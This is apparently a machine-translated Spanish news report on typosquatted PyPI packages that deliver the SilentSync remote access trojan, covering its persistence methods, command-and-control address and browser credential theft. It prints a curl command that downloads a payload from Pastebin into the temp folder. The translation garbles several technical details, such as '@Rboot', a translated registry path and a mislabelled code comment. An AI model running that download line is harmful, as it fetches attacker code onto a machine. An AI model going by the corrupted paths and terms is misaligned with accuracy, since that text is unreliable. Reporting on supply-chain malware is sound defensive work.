Los desarrolladores de Python enfrentan una amenaza creciente de los paquetes tipográfico en el Índice de paquetes de Python (PYPI), con actores maliciosos que se dirigen cada vez más a este repositorio confiable para distribuir malware sofisticado.
Los descubrimientos recientes han expuesto una tendencia preocupante en la que los actores de amenaza crean paquetes que imitan estrechamente bibliotecas legítimas, utilizando ligeras variaciones de ortografía para engañar a los desarrolladores desprevenidos para que instalen un código dañino.
En julio de 2025, los investigadores de seguridad comenzaron a rastrear una serie de paquetes de Python maliciosos que emplean esta técnica engañosa.
El descubrimiento inicial de un paquete llamado Termncolor marcó el comienzo de lo que se convertiría en una campaña más amplia dirigida a la comunidad de desarrollo de Python.
Estos paquetes demuestran cómo han evolucionado los ataques de la cadena de suministro para explotar el lugar de los desarrolladores de confianza en repositorios de código abierto.
La amenaza se intensificó significativamente a principios de agosto de 2025, cuando los analistas de Zscaler identificado Dos paquetes de Python maliciosos adicionales llamados Sisaws y Secmeasure.
Ambos paquetes fueron rastreados hasta el mismo autor y entregaron un troyano de acceso remoto recientemente descubierto doblado Silentsync.
El paquete Sisaws aprovecha específicamente el tipo de tipográfico contra el paquete legítimo de SISA, que proporciona capacidades de integración para el Sistema Nacional de Información de Salud de Argentina, Sistema Integrado de Información Sanitaria Argentino.
Estos paquetes maliciosos muestran técnicas sofisticadas de ingeniería social, imitando cuidadosamente la funcionalidad y la apariencia de sus homólogos legítimos.
Cadena de ataque (Fuente – ZScaler)
Los actores de amenaza demostraron una notable atención al detalle, asegurando que sus paquetes pasarían una inspección casual mientras oculta los peligrosos mecanismos de entrega de carga útil dentro de las funciones de inicialización aparentemente benignas.
La rata Silentsync representa un avance significativo en el malware basado en Python, que incorpora mecanismos de persistencia multiplataforma, capacidades integrales de exfiltración de datos y sofisticados protocolos de comunicación de comandos y controles.
Actualmente se dirige a los sistemas de Windows a través de los paquetes PYPI maliciosos, Silentsync mantiene la compatibilidad incorporada para los entornos de Linux y MacOS, lo que sugiere una posible expansión futura de la campaña.
Mecanismos de persistencia y evasión
Silentsync emplea técnicas de persistencia específicas de la plataforma que demuestran la filosofía de diseño sofisticada del malware.
La rata implementa diferentes enfoques dependiendo del sistema operativo objetivo, asegurando el acceso sostenido independientemente del entorno de la víctima.
En los sistemas de Windows, Silentsync establece la persistencia mediante la creación de una entrada de registro bajo el HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Ejecutar la tecla con el nombre Pyhelper, iniciando automáticamente el script malicioso durante el inicio del sistema.
El mecanismo de persistencia de Linux del malware implica modificar el archivo de configuración CRONTAB de la víctima, insertar una directiva @Rboot que ejecuta la carga útil cada vez que se reinicia el sistema.
Para los objetivos de MacOS, SilentSync genera un archivo de lista de propiedades llamado com (.) Apple (.) Pyhelper (.) Plist dentro del directorio ~ / biblioteca / lanzador / el directorio, registrándose como un agente de lanzamiento que se activa durante las sesiones de inicio de sesión del usuario.
La infraestructura de comando y control de Silentsync utiliza la comunicación HTTP con un servidor codificado en la dirección IP 200.58.107.25, que se almacena en la codificación Base64 y decodifica durante el tiempo de ejecución para evadir el análisis estático.
El malware implementa una arquitectura API REST utilizando el puerto TCP 5000, con puntos finales específicos para diferentes funciones operativas que incluyen balizas de conectividad, solicitudes de comandos, informes de estado y exfiltración de datos.
# Ejemplo del mecanismo de decodificación hexadecimal de Silentsync utilizado en los paquetes maliciosos curl – sl https (:) // pastebin (.) Com/raw/jah2ure1 – o %temp %\\ helper (.) Py
Las capacidades de recopilación de datos de la rata se extienden más allá del robo básico de archivos para incluir la recolección integral de datos del navegador.
Silentsync se dirige específicamente a los navegadores basados en el cromo, incluidos Chrome, Edge y Brave, así como Firefox, extrayendo cuatro categorías de datos críticos de cada perfil: historial de navegación, información de enfoque automático, cookies almacenadas y credenciales guardadas.
Después de una exfiltración exitosa, el malware elimina sistemáticamente todas las huellas de sus actividades del sistema infectado para minimizar los riesgos de detección.
¡Encuentra esta historia interesante! Séguenos Google News, LinkedIny incógnita Para obtener más actualizaciones instantáneas.
